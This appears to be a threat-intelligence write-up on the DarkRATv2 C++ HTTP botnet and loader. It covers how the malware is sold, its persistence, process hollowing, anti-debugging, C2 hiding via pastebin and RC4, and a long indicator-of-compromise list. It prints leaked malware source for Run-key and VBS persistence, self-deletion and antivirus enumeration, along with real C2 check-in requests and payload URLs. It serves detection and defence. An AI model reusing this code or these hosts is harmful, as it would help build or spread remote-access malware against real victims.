# DarkRat v2.2.0 **[github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md](https://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md)** albertzsigovits master ## malware-writeups/DarkRATv2/README.md Cannot retrieve contributors at this time **Technical synopsis of a C++ Native HTTP Botnet and Loader** Description Darkrat was first found being advertised on HF and is described by the creator as: ``` Darkrat is designed as a HTTP loader, it is coded in C++ with no dependency, the Current bot is design for the Windows API! this means, *DarkRat* has no Cross Platform Support. ``` ----- This HTTP loader - in reality - acts more like a bot controller. Disclaimer The developer also puts out a small disclaimer in order to avoid potential litigation: This is often seen with other RATs. ``` I, the creator, am not responsible for any actions, and or damages, caused by this software. You bear the full responsibility of your actions and acknowledge that this software was created for educational purposes only. This software's main purpose is NOT to be used maliciously, or on any system that you do not own, or have the right to use. By using this software, you automatically agree to the above. Copyright (c) 2017-2019 DarkSpider Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ``` Then my question is: why is it only advertised on underground cybercrime forums? The developer The dev uses the moniker `Darkspider on both HF and both in the compiled executables` pdb path. Crawling through Darkspider's posts on HF, there seems to be some clue to his german/austrian/swiss origin: ----- The dev is also present on Discord and has a channel where he announced milestones regarding his RAT: ----- ----- Pricing, forums, seller Darkspider offers 3 packages that customers can potentially choose from: Basic/GOLD: unlimited Source Version: There is unfortunately only two version available because I can not give any development support (8/10 SOLD) Private Versions: On Request The dev also sells source versions which means DarkRatv2 is potentially being re-selled by other individuals too. Relation to other families Interesting enough to note that the main description of DarkRAT is basically a copy-paste of AbSent-Loader's description. As we will see with the inner workings, clearly, the developer took a lot of ideas and inspiration from both: [https://github.com/Tlgyt/AbSent-Loader](https://github.com/Tlgyt/AbSent-Loader) [https://github.com/zettabithf/LiteHTTP](https://github.com/zettabithf/LiteHTTP) Just recently, a new Botnet was also announced on HF: it has unmistakable ties to DarkRATv2. I will try to keep track all of the different 'forks' of DarRAT, since it's really favored in cybercrime rings: Here's a customized DarkRATv2 panel, called GRS: Additional documentation: ----- The developer maintains a DarkRAT manual on: [http://darktools.me/docs/](http://darktools.me/docs/) [http://wsyl2u7uvfml6p7p.onion/docs/](http://wsyl2u7uvfml6p7p.onion/docs/) Also it's possible to gain additional insights into the workings of the panel by browsing to README.md on a C2 server: ## Features Panel Template System based on Smarty Dynamic URL Routing Multi User Support Plugin System Statistics of Bots & online rates Advanced Bot Informations Task Tracking Task Geo Targeting System Task Software Targeting System (for .net software) Bot 2.2.0 ----- Running Persistence Startup Persistence Installed hidden on the FileSystem Download & Execute Update Uninstall Custom DLL Loading Direct Connect or RAW forwarder (Like pastebin/gist also supported own plain/raw sites) AV detection Included Plugins Botshop with autobuy Bitcoin API Alpha version of a DDOS (NOT STABLE) Examples ## Functionalities Execution flow Running Persistance Command: `cmd.exe /k start %APPDATA%\Microsoft\Windows\00jXHoowyD.vbs:` ``` Do sComputerName = "." Set objWMIService = GetObject("winmgmts:\\" & sComputerName & "\root\cimv2") sQuery = "SELECT * FROM Win32_Process" Set objItems = objWMIService.ExecQuery(sQuery) Dim found found = "false" For Each objItem In objItems If objItem.Name = "00jXHoowyD.exe" Then found = "true" End If Next If found = "false" Then Dim objShell Set objShell = WScript.CreateObject("WScript.Shell") objShell.Run("C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\00jXHoowyD.exe > Nul ") Set objShell = Nothing End If WScript.Sleep 1000 Loop ``` ----- The vbs file provides periodic checks to ascertain whether the process is running in the background or not. Startup Persistance API: `RegSetValueExA` Key: ``` HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\WinSystem32 ``` Value: `C:\Users\user\AppData\Roaming\Microsoft\Windows\00jXHoowyD.exe` Tries to be shady by calling itself WinSystem32. The Run key points to the following location on the file system. Leaked source: ``` void addstartup() { TCHAR path[100]; GetModuleFileName(NULL, path, 100); HKEY newValue; RegOpenKey(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", &newValue); RegSetValueEx(newValue, "System32", 0, REG_SZ, (LPBYTE)path, sizeof(path)); RegCloseKey(newValue); } ``` Installed hidden on the FileSystem ``` \AppData\Roaming\Microsoft\Windows\00jXHoowyD.exe ``` or ``` \AppData\Roaming\WinBootSystem\WinBootSystem.exe ``` Being hidden means the executable is just put into %APPDATA% under the Windows folder. Uninstall ----- ``` cmd.exe /C ping 127.0.0.1 n 1 w 3000 > Nul & Del /f /q %s ``` Leaked source: ``` void uninstall() { removeRegInstallKey(); std::string remove = " /C \"PING.EXE -n 5 127.0.0.1 && del " + ExePath() + "\""; ShellExecute( NULL, _T("open"), _T("cmd"), _T(remove.c_str()), // params _T(" C:\ "), SW_HIDE); } ``` AV Detection ``` wmi with WQL Select * From AntiVirusProduct via root\SecurityCenter2 ``` ----- Leaked source code: ----- ``` g g () { std::string returnString; CoInitializeEx(0, 0); CoInitializeSecurity(0, -1, 0, 0, 0, 3, 0, 0, 0); IWbemLocator* locator = 0; CoCreateInstance(CLSID_WbemLocator, 0, CLSCTX_INPROC_SERVER, IID_IWbemLocator, (void**)& locator); IWbemServices* services = 0; wchar_t* name = L"root\\SecurityCenter2"; if (SUCCEEDED(locator->ConnectServer(name, 0, 0, 0, 0, 0, 0, &services))) { //printf("Connected!\n"); //Lets get system information CoSetProxyBlanket(services, 10, 0, 0, 3, 3, 0, 0); wchar_t* query = L"Select * From AntiVirusProduct"; IEnumWbemClassObject* e = 0; if (SUCCEEDED(services->ExecQuery(L"WQL", query, WBEM_FLAG_FORWARD_ONLY, 0, &e))) { //printf("Query executed successfuly!\n"); IWbemClassObject* object = 0; ULONG u = 0; //lets enumerate all data from this table std::string antiVirus; while (e) { e->Next(WBEM_INFINITE, 1, &object, &u); if (!u) break;//no more data,end enumeration CComVariant cvtVersion; object->Get(L"displayName", 0, &cvtVersion, 0, 0); //std::wcout << cvtVersion.bstrVal; returnString = bstr_to_str(cvtVersion.bstrVal); } } else printf("Error executing query!\n"); } else printf("Connection error!\n"); //Close all used data services->Release(); locator->Release(); CoUninitialize(); return returnString; } ``` Mutex API: `CreateMutexA` Value: `Local\3mCUq1z` ----- The mutex value is hardcoded and is different between samples. The call to CreateMutex returns a handle to the mutex '3mCUq1z' in this case. Next, GetLastError is called to determine whether the handle points to the same mutex that perhaps already existed. Then, the code compares the return of the GetLastError call to the hex value 'B7'. 'B7' is the symbolic constant for ERROR_ALREADY_EXISTS. If the mutex already exists, it won't re-infect the system. Leaked source: ``` //Check if the Bot is Running CreateMutexA(0, FALSE, "Local\\$myprogram$"); // try to create a named mutex if (GetLastError() == ERROR_ALREADY_EXISTS) // did the mutex already exist? return -1; // quit; mutex is released automatically ``` Custom DLL Loading 1. `CreateProcessA - dwCreationFlags 4 - CREATE_SUSPENDED` 2. `VirtualAlloc` 3. `GetThreadContext` 4. `ReadProcessMemory` 5. `GetModuleHandleA - NtUnmapViewofSection` 6. `GetProcAddress - ntdll.dll` 7. `VirtualAllocEx` 8. `WriteProcessMemory` 9. `SetThreadContext` 10. `ResumeThread` 11. `VirtualFree` ----- ----- This method is known as process hollowing. Malware can unmap or hollow out code from the memory of a process, and overwrite the same memory space of the process with malicious code. First, the malware needs to create a new process in suspended mode (CreationFlags 4). Next, the malware swaps out the contents of the benign file with the malicious code. This is where the call to NtUnmapViewOfSection comes into picture, which is dynamically called from ntdll.dll to unmap the memory of the target process. Now that the memory is unmapped, VirtualAllocEx is called to allocate new memory for the malware, and uses WriteProcessMemory to write each of the malware’s sections to the target process memory space. The malware also calls SetThreadContext to point the entrypoint to a new code section. As a last step, the malware resumes the suspended thread by calling ResumeThread, so that the process will continues with newly allocated malicious code. Anti-debugging techniques IsDebuggerPresent API call ----- CheckRemoteDebuggerPresent API call mov eax, large fs:30h This is used to load the address of the Process Environment Block (PEB), which is accessible via the FS segment. The PEB contains a BeingDebugged field which can be read to see if a process is being debugged. rdtsc The RDTSC instruction is used to determine how quickly the processor executes a program's instructions. It returns the count of the number of ticks since the last system reboot as a 64-bit value placed into EDX:EAX. Slowness in the processor's execution might indicate the presence of malware analysis tools, such as a debugger. QueryPerformanceCounter API call ----- GetTickCount API call Anti-error technique DarkRATv2 disables Windows error notifications right at the start of the program. ``` API: SetErrorMode ``` ``` Value: 0x8007h ``` SEM_FAILCRITICALERRORS SEM_NOALIGNMENTFAULTEXCEPT SEM_NOOPENFILEERRORBOX SEM_NOGPFAULTERRORBOX ## Leaked source code An early version of the final Botnet was leaked through the following github repo: https://github.com/Tlgyt/The[Collection/blob/master/Source%20Codes/Botnets/DarkRat%20Loader/derkrut/main.c](https://github.com/Tlgyt/The-Collection/blob/master/Source%20Codes/Botnets/DarkRat%20Loader/derkrut/main.cpp) pp ----- The developer desperately tried to get rid of the leaked source by submitting a dispute through Github: ----- Also discloses his Discord account: **Other references** Leveraging a bit of OSINT, it is also clear that the developer had used lots of resources from LiteHTTP Botnet. It's clearly a trend: up and coming malware dev take an existing malware as a recipe, add a few modifications here and there and release the new iteration as a completely new 'product': https://github.com/darkspiderbots/AbSentLoader/commit/d8e623c682fce9382d771af46463eae7504bc059 https://github.com/darkspiderbots/LiteHTTP/commit/2a29698bba64ef1abb98997e910 0240dfe37d841 https://github.com/darkspiderbots/LiteHTTP/commit/bf970261e8619d11095102007fb1 ef77b2b84c93 ----- **Cryptography** ----- There s a distinct string in the disassembly of the builder: It is also found in the following project: hCrypt, which is an AES encrypted PE Loader: [https://github.com/Include-sys/hCrypt/blob/master/Stub/main.cpp](https://github.com/Include-sys/hCrypt/blob/master/Stub/main.cpp) ``` #include #include "VirtualAES\VirtualAES.h" #include #include /* * AES Encrypted and AntiVM PE Loader (Crypter Stub) * * https://www.github.com/Include-sys/hCrypt * * Coded by Include-sys for Educational Purposes */ /* Virtual Machine Detection Functions */ /* AES-256 Bit Decryption Function */ void AESDecrypt(char* toDecrypt, int size) { //Explanation exist in Builder unsigned char key[KEY_256] = "S#q-}=6{)BuEV[GDeZy>~M5D/P&Q}6>"; unsigned char ciphertext[BLOCK_SIZE]; unsigned char decrypted[BLOCK_SIZE]; aes_ctx_t* ctx; virtualAES::initialize(); ctx = virtualAES::allocatectx(key, sizeof(key)); ## Panel ``` ----- **Login** **Dashboard** ----- **Tasks** ----- **Bots** ----- ----- **Settings** ----- ----- [routes](https://raw.githubusercontent.com/albertzsigovits/malware-writeups/master/DarkRATv2/routes.png) **Plugins** **Panel source** _../.git/HEAD_ `ref: refs/heads/master` _../.git/refs/heads/master_ `d53a9090693032825b8a4401e4975e0ffa1d55a5` _../.git/config_ ----- ``` [ ] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true [remote "origin"] url = https://github.com/darkspiderbots/darkratPanel.git fetch = +refs/heads/*:refs/remotes/origin/* [branch "master"] remote = origin merge = refs/heads/master ``` **Source filelist** _../.git/index_ .htaccess README.md favicon.ico index.php robots.txt versions/2.0/composer.json versions/2.0/index.php versions/2.0/plugins/about/Controller/aboutConroller.class.php versions/2 0/plugins/about/about php ----- versions/2.0/plugins/about/assets/nav/about.svg versions/2.0/plugins/about/template/about/about.tpl versions/2.0/plugins/custom_urls/Controller/routes.class.php versions/2.0/plugins/custom_urls/custom_urls.php versions/2.0/plugins/custom_urls/custom_urls.sql versions/2.0/plugins/custom_urls/template/settings/options.tpl versions/2.0/plugins/ddos/Controller/ddosController.class.php versions/2.0/plugins/ddos/Controller/ddosHandlerController.php versions/2.0/plugins/ddos/ddos.php versions/2.0/plugins/ddos/ddos.sql versions/2.0/plugins/ddos/dll/ddoshandle.dll versions/2.0/plugins/ddos/template/ddos/ddoshub.tpl versions/2.0/plugins/ddos/template/ddos/ddosinfo.tpl versions/2.0/plugins/example_task_extension/dll/example.dll versions/2.0/plugins/example_task_extension/example_task_extension.php versions/2.0/plugins/extreme_onion_routing/Controller/Ajax.class.php versions/2.0/plugins/extreme_onion_routing/Controller/Backend.class.php versions/2.0/plugins/extreme_onion_routing/Cron/checkServer.php versions/2.0/plugins/extreme_onion_routing/extreme_onion_routing.php versions/2.0/plugins/extreme_onion_routing/extreme_onion_routing.sql versions/2.0/plugins/extreme_onion_routing/template/Backend/extreme_onion_routing.tpl versions/2.0/plugins/extreme_onion_routing/template/Backend/manage_gates.tpl versions/2.0/plugins/extreme_onion_routing/template/Backend/manage_routers.tpl versions/2.0/plugins/logs/Controller/logController.class.php versions/2.0/plugins/logs/assets/nav/logs.svg versions/2.0/plugins/logs/logs.php versions/2.0/plugins/logs/logs.sql versions/2.0/plugins/logs/template/log/loginfo.tpl versions/2.0/plugins/logs/template/log/logs.tpl versions/2.0/plugins/miner/Controller/miner.class.php versions/2.0/plugins/miner/dll/Monero_cpu.dll versions/2.0/plugins/miner/miner.php versions/2.0/plugins/miner/template/miner/settings.tpl versions/2.0/plugins/stealer/Controller/PassMain.class.php versions/2.0/plugins/stealer/Controller/Recovery.class.php versions/2.0/plugins/stealer/dll/Stealer.dll versions/2.0/plugins/stealer/stealer.php versions/2.0/plugins/stealer/stealer.sql versions/2.0/plugins/stealer/template/passmain/cookiemanager.tpl versions/2.0/plugins/stealer/template/passmain/passrecovery.tpl versions/2.0/vendor/autoload.php ... _Full list:_ _[https://pastebin.com/A3WYH5C5](https://pastebin.com/A3WYH5C5)_ ## C2 communication _#1 Pastebin grab_ ----- ``` p Accept: text/plain Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3 Host: pastebin.com ``` _#2 Bot check-in request_ ``` POST /request HTTP/1.1 Accept: text/plain Content-Type: application/x-www-form-urlencoded User-Agent: SUq1rx Host: 37.44.215.132 Content-Length: 656 request=YUhkcFpEMHhOR0V6T0RKbE1TMDBZVEl3TFRWbU4yTXRZak5pTkMwMllXRmtOVEl3TW1Fd01XVW1ZM ``` _#3 Admin login page_ ``` POST /login HTTP/1.1 Host: advcash.network User-Agent: Mozilla/5.0 (X11; Linux i686; rv:99.0) Gecko/20100101 Firefox/99.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://advcash.network/login Content-Type: application/x-www-form-urlencoded Content-Length: 24 Cookie: PHPSESSID=abcdefghijklmnopq012345678 Connection: close Upgrade-Insecure-Requests: 1 userid=USER&pswrd=PASSWORD ## Hiding C2 addresses ``` Initially the C2 server address is hidden from your eyes. The developer had implemented a layered approach into how a certain sample is deciding which C2 server it connects to. ----- 1. There s a pastebin link in plain text embedded in the sample 2. There's also a decryption key in plain text in the sample 3. Sample gets pastebin link, content is generally a base64 encoded string 4. Decoding the base64 string reveals a binary blob 5. Then the binary blob gets decrypted with the initial key and then the plain-text is the C2 address **Pastebin and key relations** **Pastebin** **RC4 private key** 3CC2ryd2 DE4E24E3E9DEF1F54C1816AC26C18 J7vpbEz6 28BED2E43A51F81DB74F9318BA1F1A1F muEbW4SF tMJJl1hIGXmbDZOQP3bUf4xI1Mj97OQa NdUjPC1w wzXnjDj3i0pLHGhZJGMAkAdKLCpCDygH Qq0sfw23 1YqsiIPGf3mCzRuKqo46ZohUKeZFzTDH RCw33291 pZ2bEq15zrxIecBpXGR1TqjTSrvOgJiq wAEXNbVF 9C7BF1FECCE2AA3AA2F424178FD7 WeThNNxK 1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN3 EusfX8PQ no sample DPXyyALg no crypt key m2h5tLBG 65s8fe8484sf6es8f4 vy8c6ZYT tMJJl1hIGXmbDZOQP3bUf4xI1Mj97OQa i1wTNE8w no crypt key H5UZsfyw Sx4UDJ3HAlxNCiy1Xmvj8L8n84iqiFcr dNqyCpKw KouYwnCjHFjJcACwDTLiVW0tinMYVqxi HemhJqcW 5POeBkhLRpl6NfFkxavzAYAhHVi5AD5E R40x8Ax1 LnqWwGjc3WIioIDbEQUUVHfuVNCgxSI1 MmBK5bMH KP9JHafuX8LZlfXe7r58vK8IxRhULkND EznTvkbq GHyufDShu65hgduFGd98igfdp56hJugodf2 - agO2mW7VAEV2wxPHaU6FqIu18ZOvOkIC - G29kZBPCKtzCc0IEWGNFssjPfFIoKasv Xh46Jxgb gNRyjhyuPpRc63DQIGtCMO6WXDRKxIft pt3fxyTg FA27B3E1FE89C2FC184158616C51E/td> FYN0sb2Z 9DFF1BB88566612A34154A5A9D15F8 ----- ## Indicators of Compromise **DarkRatv2 versions** 1.1.0 2.0.1 2.1.3 2.2.0 **Phpmyadmin versions** 4.5.4.1 4.6.6deb5 **Git repository** [https://github.com/darkspiderbots/darkratPanel.git](https://github.com/darkspiderbots/darkratPanel.git) **Dev pastebin** [https://pastebin.com/u/darkspiderbots](https://pastebin.com/u/darkspiderbots) **Developer contacts** XMPP: [darkspider@xmpp.jp](http://10.10.0.46/mailto:darkspider@xmpp.jp) Email: [darkspiderbots@protonmail.com](http://10.10.0.46/mailto:darkspiderbots@protonmail.com) Email: [darkspider@exploit.im](http://10.10.0.46/mailto:darkspider@exploit.im) Github: github.com/darkspiderbots Site: darktools.me Site: darktools.pro **DarkRATv2 builder** SHA256: 27396fe2ff38df7e3b9d67c1112ea6cd7ede1a8e56507cca5aa0a446eb7f4143 PDB: C:\Users\darkspider\Desktop\DarkRatCoding\darkrat\bot\Release\Builder.pdb License file: darkrat.lic Gate settings: config.json Panel package: Panel.zip ----- **Builder settings** ek = Encryption key pu = Pastebin URL or Direct Encrypted URL mux = Mutex sup = Startup true/false ri = Request Interval in seconds pre = Running persistance true/false st = Spread tag ua = User-Agent pn = Some Example for DarkRat Developers ``` { "ek": "randomkey", "pu": "http://pastebin.com/raw/randomuri", "mux": "randommutex", "sup": "false", "ri": "5", "pre": "false", "st": "main", "ua": "randomua", "pn": { "FOO":"BAR"} } ``` **ITW and payloads** ----- 5.2.77.232/forum/files/taskhost.exe 35.222.227.120/haru.exe 38.37.44.215.132/bin.exe 46.45.81.148.141/dashboard/t.exe 94.140.114.180/file.exe 107.175.64.210/guc.exe 138.68.15.227/drcrypt.exe 138.68.217.234/crypted.exe 185.35.138.22/nice/nice.exe 185.222.202.218/guc.exe 198.23.202.49/guc.exe advcash.network/bin.exe advclash.online/main.exe cmailserv19fd.world/guc.exe csdstat14tp.world/guc.exe darktools.me/demon.exe darktools.me/mamasita12.exe darktools.me/talkwithdevil.exe gayahu.com/p/upload/hvnc.exe homeless.helpingourfuture.org.uk/trrr/test.exe microsoftpairingservice.biz/csrss.exe microsoftpairingservice.biz/darkrat/csrss.exe microsofttimingservice.biz/darkrat/csrss.exe mailadvert8231dx.world/hvnc.exe mailserv964k.world/spread.exe mailadvert8231dx.world/guc.exe rubthemoneybear.xyz/lucky/dark.exe sdstat9624tp.world/guc.exe securitylabs.me/samcrypt1.exe securitylabs.me/update.exe starserver1274km.world/guc.exe zadvexmail19mn.world/guc.exe zmailserv19fd.world/guc.exe zsdstat14tp.world/guc.exe **C2 servers** ----- 5.8.88.111/request 35.223.22.225/request 35.224.116.196/request 37.44.215.132/request 45.118.134.105/request 89.47.162.126/request 89.47.167.155/request 94.140.114.180/request 104.223.20.200/request 104.244.75.179/request 138.68.15.227/request 138.68.217.234/request 149.28.67.170/request 157.230.218.78/request 167.114.95.127/request 178.62.183.205/request 178.62.187.103/request 178.62.189.202/request 185.130.215.184/request 185.193.38.158/request 185.234.72.246/request 192.154.224.113/request advcash.network/request advertstar777.world/request advclash.online/request botnumdns.godbuntu.net/request cactuscooler.space/request gameclash.online/request godbuntu.net/request linuxpro.icu/request highzebra.cash/request microsoftpairityservice.biz/request microsoftsyncservice.biz/request plasticfantastic.pw/request roulette39.club/request runeliteplus.xyz/request securitylabs.me/request tuu.nu/request weloverocknroll.online/request xyro.xyz/request **C2 server resources** ../.git ../bots ../dashboard ../ddos ../edituser/1 ../login ../phpmyadmin ----- ../request ../settings ../stealer ../tasks ../versions/2.0/plugins/stealer/stealer.sql ../versions/2.0/plugins/hvnc/dll/hvnc.dll ../versions/2.0/templates/v2/install/index.tpl **Plugins** custom_urls ddos hvnc miner stealer **C2 beacon parameters (before double base64 encoding)** hwid=12a345b6-1a23-1a2b-a1b2-1abc2345d67e &computername=TEST-PC &aornot=true &installedRam=2.000000 &netFramework2=true &netFramework3=true &netFramework35=true &netFramework4=true &antivirus= &botversion=2.1.3 &gpuName=todo &cpuName=Intel(R) Core(TM) i7-6700 CPU @ 3.40GHz &arch=x64 &operingsystem=Windows 7 Service Pack 1 &spreadtag=main **Hardcoded User-Agents** User-Agent: 1FD931B7 User-Agent: BCC26 User-Agent: bDZbUf User-Agent: rvOgJiq User-Agent: SUq1rx User-Agent: t7AwFzx User-Agent: dIrPpqdynH User-Agent: gate User-Agent: SenukeDR102 User-Agent: bDZOQP3 User-Agent: EznTvkbq User-Agent: 971643fc85 User-Agent: Frisb_bott User-Agent: thisisdumb User-Agent: XDRKxIft ----- User-Agent: update2 User-Agent: testbot User-Agent: testbot777 User-Agent: hLRpl6N User-Agent: agent User-Agent: paliwa User-Agent: dark User-Agent: ACwDTLiV User-Agent: qoptv User-Agent: test111 User-Agent: somesecret User-Agent: somesecret111 User-Agent: somesecret222 User-Agent: buzrcHcgjv User-Agent: ranx User-Agent: OQ6VI91O344QD7TJGWWF **Hardcoded Mutexes** Local\muEbW4SF Local\RCw33291 Local\1RCw3329 Local\Qq0sfw23 Local\EznTvkbq Local\3CC2ryd2 Local\3mCUq1z Local\8jCPd9d Local\eWjMV Local\DvzjZ Local\VvSVp Local\PSBQv Local\hkrrI Local\EgMJa Local\ViZWD Local\YhxUy Local\fWySU Local\ujBPF Local\dLjaI Local\LnOtv Local\qxMBo Local\GTQAG Local\YUMMY Local\kCHLu Local\GBqea Local\qreaO Local\eWjMV Local\ejZbw Local\mLBas Local\gFvHS Local\dtrps ----- Local\UeXeS Local\tGlfz Local\qawsedc Local\mutextest Local\qwertqewyt Local$myprogram$ **Suspicious API calls** CheckRemoteDebuggerPresent CreateProcess CreateThread CreateToolhelp32Snapshot GetCurrentProcess GetProcAddress GetThreadContext GetTickCount GetModuleHandle IsDebuggerPresent LoadLibrary NtUnmapViewOfSection OpenProcess Process32First Process32Next ReadProcessMemory ResumeThread SetThreadContext ShellExecuteA URLOpenBlockingStreamA VirtualAlloc VirtualFree VirtualProtect WriteProcessMemory **PDBs** C:\Users\darkspider\source\repos\darkrat_hiddendesktop\Release\Client.pdb C:\Users\darkspider\source\repos\DarkRat2.0.1\Release\DarkRat2.0.1.pdb C:\Users\darkspider\source\repos\melt\Release\melt.pdb C:\Users\darkspider\Desktop\DarkRatCoding\darkrat\bot\Release\test.pdb C:\Users\darkspider\Desktop\DarkRatCoding\darkrat\bot\Release\Builder.pdb C:\Users\darkspider\Desktop\DarkRat Coding\darkrat\bot\Debug\test.pdb C:\Users\darkspider\Desktop\TinyNuke-master\Bin\int32.pdb C:\Users\darkspider\Desktop\TinyNuke-master\Bin\int64.pdb C:\Users\user\Documents\darkrat_coding\bot\Release\test.pdb C:\Users\timl8\Desktop\DarkRat2\darkrat-master\test\Release\test.pdb D:\High-End\darkrat-master_Bot-17-6-2019\darkrat-master\bot\Release\test.pdb D:\High-End\darkrat-master-2-6-2019\darkrat-master\bot\Release\test.pdb C:\Users\RIG\Desktop\VB.NET\hf\DArkRAt v2\Client\Client\obj\Debug\Client.pdb D:\DarkRat\plugintester\Release\Monero_cpu.pdb D:\DarkRat\plugintester\Release\hvnc.pdb ----- C:\darkrat-master\bot\Release\test.pdb C:\Users\lllll\Desktop\darkrat-master\bot\Release\test.pdb C:\Users\lllll\Desktop\DarkCrypter-master\Debug\Stub.pdb **Pastebins** [https://pastebin.com/raw/YBGEBviB](https://pastebin.com/raw/YBGEBviB) [https://pastebin.com/raw/wAEXNbVF](https://pastebin.com/raw/wAEXNbVF) [https://pastebin.com/raw/EusfX8PQ](https://pastebin.com/raw/EusfX8PQ) [https://pastebin.com/raw/J7vpbEz6](https://pastebin.com/raw/J7vpbEz6) [https://pastebin.com/raw/Yd76WVbu](https://pastebin.com/raw/Yd76WVbu) [https://pastebin.com/raw/Qq0sfw23](https://pastebin.com/raw/Qq0sfw23) [https://pastebin.com/raw/YBGEBviB](https://pastebin.com/raw/YBGEBviB) [https://pastebin.com/raw/RCw33291](https://pastebin.com/raw/RCw33291) [https://pastebin.com/raw/3CC2ryd2](https://pastebin.com/raw/3CC2ryd2) [https://pastebin.com/raw/WeThNNxK](https://pastebin.com/raw/WeThNNxK) [https://pastebin.com/raw/NdUjPC1w](https://pastebin.com/raw/NdUjPC1w) [https://pastebin.com/raw/DPXyyALg](https://pastebin.com/raw/DPXyyALg) [https://pastebin.com/raw/muEbW4SF](https://pastebin.com/raw/muEbW4SF) [https://pastebin.com/raw/m2h5tLBG](https://pastebin.com/raw/m2h5tLBG) [https://pastebin.com/raw/JyTUuzPa](https://pastebin.com/raw/JyTUuzPa) [https://pastebin.com/raw/EznTvkbq](https://pastebin.com/raw/EznTvkbq) [https://pastebin.com/raw/H5UZsfyw](https://pastebin.com/raw/H5UZsfyw) [https://pastebin.com/raw/dNqyCpKw](https://pastebin.com/raw/dNqyCpKw) [https://pastebin.com/raw/MmBK5bMH](https://pastebin.com/raw/MmBK5bMH) [https://pastebin.com/raw/HemhJqcW](https://pastebin.com/raw/HemhJqcW) [https://pastebin.com/raw/i1wTNE8w](https://pastebin.com/raw/i1wTNE8w) [https://pastebin.com/raw/R40x8Ax1](https://pastebin.com/raw/R40x8Ax1) [https://pastebin.com/raw/Xh46Jxgb](https://pastebin.com/raw/Xh46Jxgb) [https://pastebin.com/raw/pt3fxyTg](https://pastebin.com/raw/pt3fxyTg) [https://pastebin.com/raw/FYN0sb2Z](https://pastebin.com/raw/FYN0sb2Z) [https://pastebin.com/raw/RT7Yd0U4](https://pastebin.com/raw/RT7Yd0U4) [https://pastebin.com/raw/WRBztEKi](https://pastebin.com/raw/WRBztEKi) [https://pastebin.com/raw/vy8c6ZYT](https://pastebin.com/raw/vy8c6ZYT) [https://pastebin.com/raw/xZtv1ER4](https://pastebin.com/raw/xZtv1ER4) [https://pastebin.com/raw/AYNnn2Rh](https://pastebin.com/raw/AYNnn2Rh) [https://pastebin.com/raw/d1vxjfbT](https://pastebin.com/raw/d1vxjfbT) [https://pastebin.com/raw/hinKe47j](https://pastebin.com/raw/hinKe47j) [https://pastebin.com/raw/LNpvG48f](https://pastebin.com/raw/LNpvG48f) [https://pastebin.com/raw/0cyRbYZx](https://pastebin.com/raw/0cyRbYZx) [https://pastebin.com/raw/nQPFBUWs](https://pastebin.com/raw/nQPFBUWs) [https://pastebin.com/raw/x2fWhy40](https://pastebin.com/raw/x2fWhy40) **RC4 Encryption keys** 28BED2E43A51F81DB74F9318BA1F1A1F wzXnjDj3i0pLHGhZJGMAkAdKLCpCDygH 1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN3 0x176B24B4c871Df6e0fE4E0c735Db075064b47Bc4 1YqsiIPGf3mCzRuKqo46ZohUKeZFzTDH 9C7BF1FECCE2AA3AA2F424178FD7 ----- agO2mW7VAEV2wxPHaU6FqIu18ZOvOkIC G29kZBPCKtzCc0IEWGNFssjPfFIoKasv pZ2bEq15zrxIecBpXGR1TqjTSrvOgJiq DE4E24E3E9DEF1F54C1816AC26C18 65s8fe8484sf6es8f4 T9KTz7WlxDIwQ9mZbGTYnjsmAfaniwId TLBLz7KVoeWxOtvBuRsmEWVtiCdjgUDomUDd ksuGN8Sm9Yi3BzN6E/yZ5/SfMWC0YFkp9Ot9 GHyufDShu65hgduFGd98igfdp56hJugodf2 KP9JHafuX8LZlfXe7r58vK8IxRhULkND LnqWwGjc3WIioIDbEQUUVHfuVNCgxSI1 5POeBkhLRpl6NfFkxavzAYAhHVi5AD5E KouYwnCjHFjJcACwDTLiVW0tinMYVqxi Sx4UDJ3HAlxNCiy1Xmvj8L8n84iqiFcr tMJJl1hIGXmbDZOQP3bUf4xI1Mj97OQa gNRyjhyuPpRc63DQIGtCMO6WXDRKxIft FA27B3E1FE89C2FC184158616C51E 9DFF1BB88566612A34154A5A9D15F8 pAZukXJiQWqvGZOWCVbsEgZxhTP8inmp k7HkixO7Lvw84dwvYpZjSQxGqiEzjrbiahjU G29kZBPCKtzCc0IEWGNFssjPfFIoKasv KQCNAeDrybuzrcHcgjvrpr1b5yBz3K4PHsA GsjxvL85BkvzMLX2M4fL9EfF1ofGv88u q-}=6{)BuEV[GDeZy> 5d41cf10s8gkirunmvnjadf541fvc2yk eEqsFu818cs1pgZsrYCUkX2VDNhqOuqf 1z0X3SrAJX2AphwscBsOifBXoFGPIlAN RudtfLhumk1Xf7WRTFfPyd0hkoU9yrec **Pastebin responses** [2.0.1;http://35.204.135.202/update.zip](http://35.204.135.202/update.zip) [2.1.3;http://35.204.135.202/update.zip](http://35.204.135.202/update.zip) 